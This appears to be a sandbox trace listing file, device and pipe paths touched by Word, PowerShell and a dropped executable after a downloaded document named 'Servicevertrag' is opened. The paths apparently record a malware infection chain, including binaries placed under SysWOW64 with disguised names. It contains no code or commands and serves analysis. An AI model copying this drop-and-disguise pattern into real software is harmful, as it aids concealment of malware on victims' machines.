C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_32\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\1e85062785e286cd9eae9c26d2c61f73\System.Data.ni.dll
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Users\user\970.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2708.23433393
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2708.23433393
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2708.23433393
C:\Windows\Temp
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\NetworkService
C:\Windows\sysnative\qmgr.dll
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS.DLL
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\DNSAPI.dll
C:\Windows\sysnative\dnsapi.dll
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
C:
\??\PhysicalDrive0
\??\pci#ven_8086&dev_100f&subsys_075015ad&rev_01#4&3ad87e0a&0&0888#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{6aee89dd-bcbc-4329-b07b-c7eec7efd7ec}
\??\root#*6to4mp#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{fe09e92d-e089-4750-ba5d-f1dc277d4029}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{20ae6bf1-f960-4e04-a1f8-4706fc316b77}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\sw#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{78032b7e-4968-42d3-9f37-287ea86c0aaa}
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.BUD
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.gpd
C:\Windows\sysnative\spool\drivers\x64\3\stdnames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteNames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteFilter.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNote.ini
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\*
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\*.*
C:\Windows\SysWOW64\en-US\shdocvw.dll.mui
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Users\user\
C:\Users\user\*.*
C:\Users\user\ui\SwDRM.dll
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\en-US\sc.exe.mui
C:\Windows\SysWOW64\ui\SwDRM.dll
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\net.exe
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile00.sqm
\Device\LanmanDatagramReceiver
C:\Windows\SysWOW64\compareiface.exe
C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Program Files (x86)\Internet Explorer\ieproxy.dll
C:\Users\user\AppData\Local\Temp\~DF382AE8405A18B581.TMP
C:\Windows\System32\url.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Favorites
C:\Users\user\Favorites\Links\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
C:\Windows\SysWOW64\en-US\MSCTF.dll.mui
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E84ED3A5-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Temp\~DF56FB948D142E1A7A.TMP
C:\Users\user\Favorites\Links
C:\Windows\SysWOW64\ieframe.dll
C:\Windows\SysWOW64\stdole2.tlb
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Program Files (x86)\Internet Explorer\IEShims.dll
C:\Windows\SysWOW64\shell32.dll
C:\Program Files (x86)\Internet Explorer\sqmapi.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files (x86)\Microsoft Office\Office14\
C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
\??\PIPE\samr
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc:Zone.Identifier
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents\desktop.ini
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\System32\
C:\Windows\System32\en-US\shdocvw.dll.mui
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\winsxs\FileMaps\program_files_x86_microsoft_office_office14_295527d9bd5a393d.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Links
C:\Windows\sysnative\ieframe.dll
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Manifest
C:\program files (x86)\internet explorer\iexplore.exe
C:\program files (x86)\internet explorer\en-US\iexplore.exe.mui
C:\Windows\Branding\ShellBrd\shellbrd.dll
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Local\Microsoft\Windows\Burn
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.3.Manifest
C:\Program Files (x86)\Microsoft Office\Office14\WWLIB.DLL
C:\Program Files (x86)\Microsoft Office\Office14\GFX.DLL
C:\Windows\System32\wtsapi32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files (x86)\Microsoft Office\Office14\OART.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Windows\System32\msi.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\
C:\Users\user\AppData\Local\Temp\CVRDFC4.tmp
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSORES.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\RICHED20.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.config
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5441CC-5075-4B4A-912D-1845B4B60578}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C748C9A8-5233-479B-BF2B-A74C3BC07527}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3B010865-3F5E-4A31-8B77-A29525663C1A}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\875991CB.czSJPY5
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EAC56381-98E9-43E8-8750-30BF9D94E9FF}.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL\3
C:\Program Files (x86)\Microsoft Office\Office14\msproof7.dll
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPCEXT.DLL
C:\Windows\System32\WinSCard.dll
C:\Windows\System32\winhttp.dll
C:\Windows\System32\webio.dll
C:\Windows\System32\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\Local\Temp\CabF299.tmp
C:\Users\user\AppData\Local\Temp\TarF29A.tmp
C:\Users\user\AppData\Local\Temp\CabF3E3.tmp
C:\Users\user\AppData\Local\Temp\TarF3E4.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\CabF9FD.tmp
C:\Users\user\AppData\Local\Temp\TarF9FE.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
C:\Users\user\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
\??\PIPE\srvsvc
C:\Windows
C:\Windows\System32
C:\Windows\System32\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIICTOTTU4R5EN55EZ6A.temp
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwershell.exe.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\b1c511d8fad78ad3c5213b2b4fb02b8b\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4436815b432c313255af322f4ec3560d\System.Management.Automation.ni.dll
C:\Windows\System32\l_intl.nls
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\4f68cd04686e5dc5a55070d112d44bdf\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuratio#\f02737c83305687a68c088927a6c5a98\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Man#\ee28a075665b6bc23b6dae56903d431d\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\ad18f93fc713db2c4b29b25116c13bd8\System.Transactions.ni.dll
C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\3008a05e2928e2c1d856cc34e0422c17\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8df695fb80187f65208d87229e81e8a2\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8ce205027e30804d1b2deaffa0582735\Microsoft.PowerShell.Security.ni.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\45ec12795950a7d54691591c615a9e3c\System.DirectoryServices.ni.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\System32\tzres.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\1e85062785e286cd9eae9c26d2c61f73\System.Data.ni.dll
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS.DLL
C:\Windows\sysnative\dnsapi.dll
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
\??\pci#ven_8086&dev_100f&subsys_075015ad&rev_01#4&3ad87e0a&0&0888#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{6aee89dd-bcbc-4329-b07b-c7eec7efd7ec}
\??\root#*6to4mp#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{fe09e92d-e089-4750-ba5d-f1dc277d4029}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{20ae6bf1-f960-4e04-a1f8-4706fc316b77}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\sw#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{78032b7e-4968-42d3-9f37-287ea86c0aaa}
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.BUD
